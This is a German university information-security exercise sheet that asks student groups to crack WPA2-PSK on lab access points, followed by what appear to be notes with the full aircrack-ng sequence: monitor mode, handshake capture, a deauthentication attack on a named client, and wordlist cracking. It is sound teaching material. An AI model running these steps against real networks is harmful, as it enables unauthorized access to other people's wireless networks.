Blockwoche Informationssicherheit: Übung 16
Aufgabe 1, 5 Punkte, Gruppe
Im privaten Bereich und in kleinen Unternehmen wird heute noch oft
WPA2 mit Pre-shared Keys eingesetzt. Inzwischen sind aber auch darauf
Angriffe bekannt geworden, die es ermöglichen, das verwendete
Passwort zu ermitteln. Das auch praktisch auszuprobieren, ist die
Aufgabe von diesem Übungsblatt. Dazu stellen wir Euch Access Points
mit WPA zur Verfügung, die Ihr mit den aircrack-ng-Tools angreifen
sollt.
Welches Problem hat WPA2, das ein Angreifer sich zunutze machen kann?
Wie geht Ihr bei Eurem Angriff vor? Wie unterscheidet sich dieser
Angriff von dem auf WEP? Worauf sollte man achten, wenn man WPA2-PSK
einsetzt?
Mit Glück und Geduld erlangt Ihr die für den Angriff benötigten Daten
alleine durch Lauschen. Welchen aktiven Angriff könnt Ihr aber
durchführen, um direkt an die Daten zu kommen? Tipp: findet am besten
vor dem Angriff heraus, wie Ihr nur wenige Daten auf einmal sendet,
damit Ihr den Empfänger nicht überlastet.
Abgabe
bis 2025-02-13 23:59 UTC, digital in Stud.IP als zip-Archiv mit einer
Markdown-Datei, einem gerenderten PDF dieser Markdown-Datei und allen
Dateien, die die Markdown-Datei zum Rendern braucht. Als Dateinamen
verwendet Ihr isec24_ueb16_grpYY.(md|pdf|zip) (Das YY mit Eurer
Gruppennummer ersetzen). Dabei bitte in der Datei alle
Gruppenmitglieder namentlich nennen. Ebenso die Nummer Eurer Gruppe in
Stud.IP.
Bitte steckt die Energie ins Denken und Schreiben, nicht in eine
wunderschöne Formatierung — lesbar darf es allerdings sein. Die
Lösungswege sollten ggf. nachvollziehbar sein.
Wenn Ihr Euch irgendwelcher Quellen aus dem Netz bedient (Anleitungen,
HowTos, etc.), gebt diese bitte als URI mit an.
*Carsten Bormann, Karsten Sohr, Stefanie Gerdes, Jan-Frederik
Rieckers, Finn Ewers, Andreas Benischke ·
iw dev
sudo airmon-ng check kill
iwconfig
DC:A6:32:C6:7A:6D
sudo airodump-ng -c 11 --bssid DC:A6:32:C6:7A:6D -w psk wlan0
64:E8:33:85:22:58
sudo aireplay-ng -0 1 -a DC:A6:32:C6:7A:6D -c 64:E8:33:85:22:58
wlan0
sudo aircrack-ng -w rockyou.txt -b DC:A6:32:C6:7A:6D psk-03.cap
